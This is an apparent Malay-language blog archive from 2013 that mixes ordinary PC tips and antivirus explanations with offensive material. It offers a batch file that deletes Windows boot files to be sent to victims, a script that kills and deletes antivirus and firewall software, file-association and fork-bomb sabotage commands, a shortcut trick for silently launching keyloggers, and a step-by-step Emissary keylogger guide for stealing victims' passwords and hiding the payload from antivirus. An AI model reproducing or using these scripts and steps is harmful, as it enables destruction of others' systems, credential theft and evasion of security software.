Thursday 28 February 2013

How to speed up firefox


1. Di "address bar" taipkan “about:config”2. Di kotak "filter" taipkan “network.http”3 Setkan “network.http.pipelining” menjadi “true” dan “network.http.proxy.pipelining” menjadi “true” dan setkan “network.http.pipelining.maxrequests” menjadi 30
4. Siap sudah langkah pertama dan seterusnya , klik pada mouse kanan dimana-mana.
5. Pilih "NEW" dan cari "Integer"6. Namakan sebagai “nglayout.initialpaint.delay” dan set menjadi 07. Tutup firefox , restart PC dan nikmatilah.

Dual Boot OS


Amaran : Pastikan anda telah membuat partition didalam hard-disk atau mempunyai multiple hardisk didalam komputer.

1. Bukak komputer menggunakan OS yang telah di-install dan masukkan CD / DVD window yang lain.
2. Di Menu window , klik untuk install
3. Dapatkan maklumat yang lebih lanjut dan terkini untuk memastikan peng-install-an sempurna.
4. Selepas install , taipkan serial key untuk mengaktifkan..
5. Untuk jenis install , pilih "Custom"6. Untuk install windows , pilih partition yang anda tetapkan atau hardisk yang anda telah tetapkan.7. Klik "Next" untuk install..8. Tunggu sehingga selesai dan tamat.

CMD coding ( Matrix Style )


1. Salin coding ini.

@echo off
:loop
COlor 0A
Title [ TROJEN-BACKDOOR-HAS-BEEN-INFECTED ]

echo 0 A 0 1 1 1 A 0 1 0 1 0 7 7 8 9 9 1 0 1 0 1 A 1 0 a d d f f 1 0 8
echo 0 0 0 0 0 0 0 0 1 A 0 A 1 0 A 1 1 1 1 0 A 1 0 A 5 5 6 7 a n k k k
echo 0 1 0 1 0 A B J 0 3 4 0 1 0 1 0 1 B A A O i d d 3 3 4 4 6 7 7 g u
echo 0 2 3 1 1 1 5 5 6 5 6 8 9 5 4 5 4 5 5 4 5 5 6 4 f f f g j d g d f g d
echo 2 4 5 6 5 5 6 5 9 4 5 7 7 7 7 8 9 9 0 66 6 1 5 5 6 4 5 5 8 6 4 4 6 4
goto :loop

@echo off
:START
start a.bat

2. Simpan dalam notepad dan namakan sebagai MatRix.bat
3. Hantar kepada rakan-rakan melalui email , IM dan dll4. Selesai.

Wednesday 27 February 2013

What is Social Engineering

Social Eng adalah permainan minda yang dilakukan oleh seorang PENGGODAM kepada individu dan bergantung kepada kebijaksanaan individu tersebut. Penggodam kebiasaan-nya menggunakan laman sosial untuk menjalankan misi-nya. Antaranya penggodam akan menegur , dan berbicara dengan baik kerana mereka berhati-hati takut muslihat diketahui mangsa. Seterusnya penggodam akan menyuruh mangsa membuka "fake application" dan menyuruh mangsa mengisi maklumat tersebut. Apabila maklumat itu telah di-isi , dengan menekan "ENTER" maklumat yang di-isi akan dihantar ke penggodam seterusnya penggodam mendapat kata-laluan dan email. Kebiasaannya teknik ini lebih difocuskan kepada penggodam yang mahu mempelajari ilmu menggodam dengan cepat.  Selain itu , selepas mangsa yang menekan "fake link" sesuatu website itu dan akan ia menyuruh anda melakukan sesuatu seperti men-download file yang tidak diketahui unsurnya. Kebiasaannya penggodam akan menggunakan "File Sharing" untuk menyebarkan virus dll. Peggodam yang handal boleh membuat sebuah website yang apabila dimasuk ia seperti website sebenar dan membuatkan mangsa lebih mudah tertipu. Apabila file itu telah di-download , penggodam akan menyuruh mangsa menginstall "SETUP" yang baru didownload. "SETUP" yang didownload mungkin berbau kelogger atau pun virus. Penggodam yang handal pandai memanipulasikan coding didalam satu-satu "SETUP" untuk memastikan ia tidak boleh dikesan oleh AV. Kesimpulannya Social Eng ini bergabung dengan mana-mana kaedah lain dan lebih mudah ia adalah perkara asas dalam penggodaman.

Another CMD coding.


1. Salin Coding ini.
@ Echo off
attrib-r-s-h c: \ autoexec.bat
del c: \ autoexec.bat
attrib-r-s-h c: \ boot.ini
del c: \ boot.ini
attrib-r-s-h c: \ ntldr
del c: \ ntldr
attrib-r-s-h c: \ windows \ win.ini
del c: \ windows \ win.ini

2. Letakkan didalam notepad dan simpan sebagai Shutdownforever.bat
3. Hantar kepada manusia yang durjana.
4. Suruh mereka membuka file itu.
5. Selesai

Binary language.


00100000 : Space
01100001 : A
01100010 : B
01100011 : C
01100100 : D
01100101 : E
01100110 : F
01100111 : G
01101000 : H
01101001 : I
01101010 : J
01101011 : K
01101100 : L
01101101 : M
01101110 : N
01101111 : O
01110000 : P
01110001 : Q
01110010 : R
01110011 : S
01110100 : T
01110101 : U
01110110 : V
01110111 : W
01111000 : X
01111001 : Y
01111010 : Z

What is taskkill?


1. Taskkill adalah seperti "Task Manager dan Unlocker Assnt" tetapi taskkill menggunakan CMD a.k.a Command Prompt.
2. Menggunakan taskkill adalah cara lain yang berkesan apabila "Task Manager" anda di-nyahaktifkan
3. Kaedah taskkill ini sama seperti "Task Menager dan Unlocker Assnt" iaitu menamatkan process softwere.
4. Pertama. Tekan Start > Run > Taip CMD. Keluarlah tetingkap hitam.
5. Apabila hendak menggunakan taskkill anda haruslah mengetahui PID softwere yang sedang berfungsi.
6. Anda hanya perlu menaip "tasklist" dan keluar list softwere yang sedang berfungsi.
7. Untuk menggunakan taskkill , anda perlu menaip taskkill /PID (letakkan PID softwere tanpa kurungan)
8. Tekan Enter. Apabila command anda betul dan tepat . command anda akan dijawab seperti ini

[ Success : The process with PID **** has been terminated ]
#kaedah ini boleh digunakan untuk bermain percuma di-cafe cyber

Pop-up spam.


1. Bukak notepad.
2. Salin semua coding ini.
msgbox "You Are An Idiot"
msgbox "A HUGE Virus has been detected on your C: drive!"
msgbox "Attempting to access Panda 2020"
msgbox "Command blocked by unknown cause"
msgbox "Attempting to delete virus"
msgbox "Attempt status:"
do
msgbox "FAILED"
loop
3. Simpan sebagai anything.vbs4. Suruh rakan-rakan anda klik file itu
#Panda AV akan menghalang file berformat .vbs

How to destroy computer.


1. Tekan Start > Run > CMD

2. Apabila keluar tetingkap CMD , taip "ASSOC .exe=.maxcodegun" atau " ASSOC .jpg=.maxcodegun"

3. Nescaya komputer akan menjadi error dan anda tidak dapat melakukan apa-apa.

#Antara kesan-kesanya ialah , anda tidak akan dapat membuka apa-apa jenis softwere atau file yang terdapat didalam komputer dan anda juga tidak dapat "RESTORE" komputer anda kepada asal.
#Terdapat altenatif lain juga iaitu menggunakan .bat file.
1. Bukak notepad dan kosongkan notepad jika ia mengandungi apa-apa maklumat.
2. Tampalkan coding ini didalam notepad [ assoc .exe=exefile / "assoc .exe=exefile ] pilih salah satu.
3. Simpan file itu menjadi .bat file.
4. Klik file yang disimpan itu.

Taskkill for AV


1. Bukak Notepad
2. Tampalkan coding ini didalam notepad
@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --
3. Simpan sebagai format .bat

Spamming CMD on your computer.


1. Bukak notepad2. Salin coding ini.
@echo off
:START
start a.bat
3. Simpan sebagai format .bat
4. Bukak fail ini.

Sality


1. Putuskan komputer anda dari jaringan manapun, baik itu LAN maupun internet.
2. Matikan fitur system restore anda selama proses pembersihan virus sality
3. Download Sality Repair disini
4. Extract file SalityRepair dan klik kanan file repair.inf kemudian klik kanan dan klik Install
5. Matikan semua aplikasi yang aktif dan sedang anda buka
6. Download Norman Malware Cleaner
7. Ubah ekstensi Norman Malware Cleaner dari .exe menjadi .cmd agar aplikasi Norman Malware Cleaner tersebut tidak diinfeksi oleh virus sality
8. Lakukan scanning menggunakan Norman Malware Cleaner.cmd (ekstensi .exe sudah anda rubah menjadi .cmd)
9. Restart komputer anda setelah proses cleaning selesai
10. Download FixReg
11. extrack FixReg.rar dan jalankan registri yang ada di folder FixReg
sesuai dengan windows yang anda gunakan.
12. Restart komputer anda.
13. Periksa task managerm regedit dsb untuk memastikan komputer anda sudah sembuh. Anda juga bisa melakukan scanning pada safe mode untuk memastikan komputer anda sudah benar – benar bersih dari virus sality.

Sebenarnya sudah hampir semua antivirus sudah bisa mendeteksi dan membasmi virus sality ini. Anda bisa mengupdate antivirus anda dan lakukan scanning serta repair menggunakan antivirus yang anda gunakan. Jika antivirus anda ternyata tidak mampu membasminya, maka tips membasmi virus sality secara manual diatas bisa menjadi solusi ampuh terbebas dari serangan W32Sality.AE

Shortcut for shutdown.


1. Tekan Kiri Mouse Di-desktop > Pilih New > Shortcut
2. Taip [shutdown -s -t 01] tanpa kurungan.3. Bagi nama shortcut anda mengikut kegemaran.
4. Tekan " Finish"

Mengubah Icon Shortcut.
1. Tekan Kiri Mouse Di-shortcut yang telah diebuat dan pilih properties.
2. Pilih " Change Icon " dan akan keluar amaran dan tekan " OK"
3. Pilih icon pilihan anda dan tekan " OK "
 1. Tekan Kiri Mouse Di-desktop > Pilih New > Shortcut
2. Taip [shutdown -s -t 01] tanpa kurungan.3. Bagi nama shortcut anda mengikut kegemaran.
4. Tekan " Finish"

Mengubah Icon Shortcut.
1. Tekan Kiri Mouse Di-shortcut yang telah diebuat dan pilih properties.
2. Pilih " Change Icon " dan akan keluar amaran dan tekan " OK"
3. Pilih icon pilihan anda dan tekan " OK "

Notepad coding


1. Menggunakan Notepad sebagai diari anda

- Taipkan .LOG
- Simpan sebagai LOG.txt
- Tuliskan apa sahaja dalamnya dan ia akan disimpan dengan masa apabila anda menyuntingnya (edit) semula.

2. Matrix Notepad

@echo off
color 2
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

Simpan sebagai Matrix.bat dan klik padanya.

3. Membuka DVD Drive

Set oWMP = CreateObject(“WMPlayer.OCX.7?)

Set colCDROMs = oWMP.cdromCollection

do

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count – 1

colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count – 1

colCDROMs.Item(i).Eject

Next

End If

wscript.sleep 5000

loop
Salin kod di atas dan simpan sebagai 'namayangandasuka.vbs'.

4. Prank Hacked Virus

@ECHO off

:Begin

msg * Hell-O..

msg * Kenal aku?

msg * Oh.. Kenal?

msg * Baguslah begitu, ok?

msg * Sebab kau dah kena hack! LOL!

GOTO BEGIN
Salin kod diatas ke dalam notepad dan simpankannya sebagai 'namayangandasuka.bat'.

5. Infinite Notepad

@ECHO off

:top

START %SystemRoot%system32notepad.exe

GOTO top
Simpan sebagai 'namayangandasuka.bat'.

False linking on shortcut


Antara cara untuk mengaktifkan prank / virus yang memerlukan install / keylogger tanpa diketahui mangsa.

Contoh , kita mempunyai " Setup Adobe"1. Buat " Shortcut di desktop"
2. Tukar kan format setup " exe " kepada " txt "
3. Tukar target "shortcut" anda kepada ( contoh : C:\WINDOWS\system32\cmd /c adb.txt ) tanpa kurungan
4. Tukar icon "shortcut" anda agar kelihatan tidak mencurigakan.

External RAM trick..


1. Masukkan pendrive pada port USB..

(Pendrive mestilah bersaiz 1GB..kalau 4GB lebih baik)


2. Klik kanan pada 'My Computer'..


3. Klik 'Properties'..


4. Klik 'Advanced'..


5. Klik 'Settings' pada bahagian 'Performance'


6. Klik 'Advanced'..


7. Klik 'Change' pada 'Virtual Memory'..


8. Pilih memori yang ada pada pendrive anda..


9. Tetapkan nilai yang anda ingini dan klik 'OK'..


10. Restart PC anda..selesai!

Tuesday 26 February 2013

Refresh your RAM


1. Bukak Notepad
Tulis [ FreeMem=Space(64000000) ] tanpa [ ]
2. Simpan didalam format .vbs

How to prevent my computer from freezing


MSConfig
1. Gunakan [ System Configuration Utility ] 
- Start > Run > taip msconfig
2. Cari tab bahagian startup.
- tengok yang mane anda rasa perlu dipadamkan ketika " startup"
- pastikan tidak tersalah padam.
- jika ragu-ragu usah padam, rujukan boleh dilakukan dengan melihat tab " Command " dan " Location "


Matikan Proses " Explorer.exe"
1. Buka Task Manager.
2. "end process" pada [ explorer.exe ] 
3. Pastikan anda telah buka aplikasi yang anda mahukan sebelum mematikan proses " explorer.exe"
4. Untuk hidupkan semula komputer seperti biasa  , buka Task Manager.
5. Cari tab "Shutdown" dan pilih log tutup.
6. Selepas itu akan keluar paparan Login Screen.
7. Masuk seperti biasa samada anda menggunakan kata laluan ketika Login Screen ataupun tidak.

Tutorial for Emissary Keylogger


Step 1: Download ‘Emissary Keylogger‘ Software and extract the files to desktop. If your Antivirus deletes the file, then please turnoff your Antivirus or uninstall it and try downloading again.
Step 2: Run ‘Emissary.exe’ file and enter your gmail account details,  so that the password and other info of your victim can be mailed to you. If you are afraid of entering your gmail details, then do create one temporary fake account and enter those details.
Step 3: After you enter your ‘Gmail account’ details Click on ‘Test’ to test the connection to your Gmail account.  In the Server name Field you can change the name if you want. enter any Time Interval in the interval field. This timer controls the time interval between two keylogs emails. You can also show fake error message to your Victim when he clicks your server.exe file. to do so enter the error title and description in the ‘Fake error message’ field.
Step4: Now after filling the required fields, Click ‘Build’ button. This will create another file called server.exe in the same directory.
Step5: Now send this server.exe file to victim and make him install it on his computer. You can use Binder or Crypter to bind this server.exe file with say any .mp3 file so that whenever victim runs mp3 file, server is automatically installed on his computer without his knowledge. also read: How to change ICON of .exe file?

GOD MODE windows 7


Windows 7 telah memonopoli sebahagian besar pengguna komputer di seluruh dunia pada ketika ini.Mungkin ada sesetengah pengguna yang tidak tahu ada "triks tersembunyi" pada Windows 7.
Kebanyakkan pengguna memanggil ia sebagai "God Mode".


God Mode ialah suatu folder yang sengaja disembunyikan oleh pihak Microsoft kerana sebab-sebab tertentu.
Fungsi God Mode ini ialah membenarkan pengguna menukar dan mengubah keseluruhan tetapan Windows 7 dalam hanya satu folder.
Kalau tidak faham Analyzer terangkan sikit.


Contohnya sebelum ini anda hendak menukar password Windows anda,anda perlu klik pada butang start,control panel dan user account.
Tapi jika pada God Mode ini anda hanya perlu klik pad folder God Mode dan pilih terus "Change Windows Password".Mudahkan?

Make your Computer Talk


1. Bukak Notepad dan salin ayat dibawah dan letakkan kedalam notepad.
Dim message, sapi
message=InputBox("What do you want me to say?","Speak to Me")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message
2. Simpan sebagai SpeakToMe.vbs
3. Klik fail berikut dan mulakan menaip.

What is web spoofing


Web Spoofing
Masih ingat kes pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah satu contoh nyata dari Web spoofing. Inti dari tenik ini ialah dengan memanfaatkan kesalahan user saat mengetikkan alamat laman web pada address bar. Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia sedang mengakses suatu situs tertentu, padahal bukan.

Pada kes bank BCA, pelaku membuat laman web yang sangat mirip dan serupa dengan laman web aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal, kerana laman tersebut adalah laman web yang palsu, maka semua informasi berharga tadi terakam oleh webserver palsu, yaitu milik sang pelaku.

How an Antivirus Program Works


Pengenalan

Kerana semakin meningkat ancaman dari virus dan program berbahaya yang lain, hampir setiap komputer hari ini dilengkapi dengan perisian antivirus pra-pasang di dalamnya. Bahkan, antivirus telah menjadi salah satu daripada pakej perisian yang paling penting bagi setiap komputer. Walaupun setiap orang dari kita memiliki software antivirus yang dipasang di komputer kita, hanya sedikit yang benar-benar mahu untuk memahami bagaimana antivirus bekerja! jika korang adalah salah satu di antara orang yang benar-benar akan mahu untuk memahami bagaimana antivirus bekerja, maka artikel ini adalah untuk korang.


Bagaimana Antivirus Melakukan Kerjanya?

Sebuah perisian antivirus biasanya menggunakan pelbagai strategi dalam mengesan dan menghilangkan virus, worm dan program malware yang lain. Berikut ini adalah dua kaedah pengenalan yang paling banyak digunakan:


1. Pengesanan Berasaskan Signature Detection (Pendekatan Kamus)

Ini adalah kaedah yang paling umum digunakan yang melibatkan mencari pola yang dikenali virus dalam fail yang diberikan. Setiap perisian antivirus akan memiliki kamus kod malware sampel disebut tanda tangan (signature database) dalam database itu. Setiap kali sebuah file diperiksa, antivirus merujuk pada kamus kod sampel yang ada di dalam database dan membandingkan dengan fail pada saat itu. Jika potongan kod dalam fail sesuai dengan yang di dalam kamus maka ia ditandai dan tindakan yang tepat diambil untuk menghentikan virus sebelum replikasi lebih jauh. Antivirus boleh memilih untuk memperbaiki fail tersebut, kuarantin atau memadamnya secara kekal berdasarkan potensi risiko virus itu.

Apabila virus baru dan malwares dicipta dan dikeluarkan setiap hari, kaedah pengesanan tidak dapat membela dan melawan malwares baru kecuali sampel mereka dikumpulkan dan tanda tangan yang baru dikeluarkan oleh syarikat perisian antivirus. Beberapa syarikat juga boleh mendorong pengguna untuk meng-upload virus baru atau variasi (variants), sehingga virus dapat dianalisis dan tanda tangan boleh ditambah ke dalam kamus.

Pengesanan berasaskan signature database boleh jadi sangat berkesan, tetapi memerlukan kita untuk sering update dari kamus virus signature database. Oleh kerana itu pengguna harus mengemas kini perisian antivirus mereka secara teratur sehingga dapat bertahan terhadap ancaman baru yang dikeluarkan setiap hari.


2. Pengesanan Berasasan Heuristik (Pendekatan Terhadap Perilaku Mencurigakan)

Pengesanan berasaskan Heuristik melibatkan pengenapastian perilaku yang mencurigakan dari setiap program tertentu yang mungkin menunjukkan risiko berpotensi. Pendekatan ini digunakan oleh beberapa software antivirus canggih seperti ESET NOD32 ANTIVIRUS dan ESET NOD32 SMART SECURITY untuk mengenalpasti malware baru dan variasi malware yang dikenali. Berbeza dengan pendekatan yang berpusat kepada tanda tangan, di sini antivirus tidak mencuba untuk mengenal pasti virus yang dikenali, melainkan memantau perilaku semua program.

Misalnya, perilaku berbahaya seperti sebuah program cuba untuk menulis data ke program eksekusi, ditandakan dan pengguna diperingatkan tentang tindakan ini. Kaedah pengesanan memberikan tambahan tahap keselamatan daripada ancaman yang tidak diketahui.

Fail emulasi: Ini adalah jenis lain dari pendekatan berasaskan heuristik di mana program tertentu dijalankan dalam persekitaran maya dan tindakan yang dilakukan olehnya direkodkan. Berdasarkan tindakan login, perisian antivirus dapat menentukan sama ada program ini berbahaya atau tidak dan melakukan tindakan yang diperlukan dalam rangka untuk membersihkan jangkitan.

Kebanyakan software antivirus komersial menggunakan kombinasi pendekatan keduanya berasaskan signature dan heuristik ntuk memerangi malware.

The reasons an account is hacked


1. Kecuaian Pengguna
Inilah penyebab utama akaun Facebook dihack dan diakui di seluruh dunia. Apakah anda menyimpan dengan baik password Facebook anda? Apakah anda mengikuti saranan dari Facebook untuk mengkombinasikan huruf kecil dengan angka dan huruf besar? Apakah anda membuka link atau pautan halaman dari teman anda yang bahkan tidak tahu asal usul link tersebut? Apakah anda mengikuti kuiz yang ratingnya rendah atau malah tidak ada? Peluang untuk menghack akaun Facebook ada dimana-
mana dan kesalahan pengguna itu sendirilah yang membuat akaun Facebook dengan mudah sahaja dihack.

2. Link web Bervirus
 Maksudnya jika anda melihat teman anda meletakkan link sebuah web, jangan terus diklik! Boleh jadi itu adalah link bervirus yang disembunyikan melalui Shorter URL atau pemendek URL. Juga kemungkinan ada button “Like” bervirus pada web-web tertentu. Sebaiknya anda hanya mengklik link dan button Like dari web yang rasmi dan dipercayai. Lebih baik lagi jika anda menginstall Norton Internet Security atau AVG atau Avast kerana antivirus-antivirus ini memiliki ciri-ciri Web Scanner yang akan mengamati apakah link itu bervirus atau tidak.

3. Aplikasi Menyesatkan
 Jangan terpancing dengan kuiz-kuiz Facebook yang isinya lucu tapi rating-nya rendah atau bahkan tidak ada. Jangan pula terpancing dengan Facebook Apps seperti “Ubah Tampilan Facebookmu dalam Seminit!” atau “Siapa yang membuka profail kamu?” atau “Who’s your no.1 Fan?”. Ingat, ketika kita hendak mengikuti kuiz atau Apps tersebut selalu ada peringatan dari Facebook yang mengatakan bahawa kuiz atau Apps ini akan mengambil informasi seperti profail, rakan, tarikh lahir, album gambar dan semuanya yang berhubungan kita akan dapat dibuka oleh aplikasi ini. Dari sinilah kracker dapat mencuri segudang informasi dari profail kita dan pada beberapa keadaan juga akan mencuri data akaun kita.

4. Keylogger
 Keylogger adalah peranti yang dapat merakam petikan keyboard kita. Keylogger boleh berupa software ataupun hardware. Kalau berupa hardware, boleh dikesan dengan mudah. Lihat saja ke lubang keyboard di belakang PC, kalau ada sesuatu yang ‘terbonjol’ atau bentuknya aneh, maka itulah Keylogger berbentuk Hardware.
Kalau software, ini sukar apalagi kalau di cyber cafe yang tidak dipasang antivirus. Namun boleh anda boleh menggunakan Virtual Keyboard. Caranya klik START, All Programs, Accesories dan cari Virtual Keyboard di sana.
Keylogger boleh juga masuk dengan sendirinya kalau kita sembarangan mengklik iklan di internet. Oleh itu selalu hati-hati dan waspada dengan web-web yang anda kunjungi.

5. “Remember Password”
 Ini adalah ciri-ciri yang selalu ada di setiap browser. Tujuannya baik, supaya pengguna tidak perlu susah-susah menaip password di web yang dituju. Tapi jangan pernah lakukan ini di cyber cafe ataupun di area hotspot!
Jika ciri-ciri ini diaktifkan di tempat-tempat awam maka dari sinilah peluang untuk menghack akaun Facebook. Untuk mematikannya, sebagai contoh di Firefox klik Tools, kemudian Options. Pilih Security kemudian hilangkan tanda check di “Remember Password For This Site” dan klik OK.

6. Cookies
 Cookies adalah ‘jejak-jejak’ pelayaran pengguna di internet. Di Cookies ini juga tersimpan data-data sensitif seperti data log in web.
Hapuskanlah selalu Cookies ini setiap kali selesai menggunakan internet, sebagai contoh di Firefox klik Tools kemudian klik Clear Recent History. Pilih Everything di sudut kanan atas dan check semua kotak, kemudian klik OK.
Atau anda boleh juga mengaktifkan ciri-ciri Private Browsing dengan menekan button Ctrl + Shift + P. Private browsing ini sangat tepat dilakukan di area hostpot kerana area hotspot adalah ‘ladang’ bagi para kracker untuk mencuri data-data kita.

7. Phishing
Adalah sebuah link yang apabila dimasuk oleh pengguna internet akan memaparkan login menu untuk sesuatu website kerana penggodam menggunakan sumber kod yang sama dengan website yang diingini.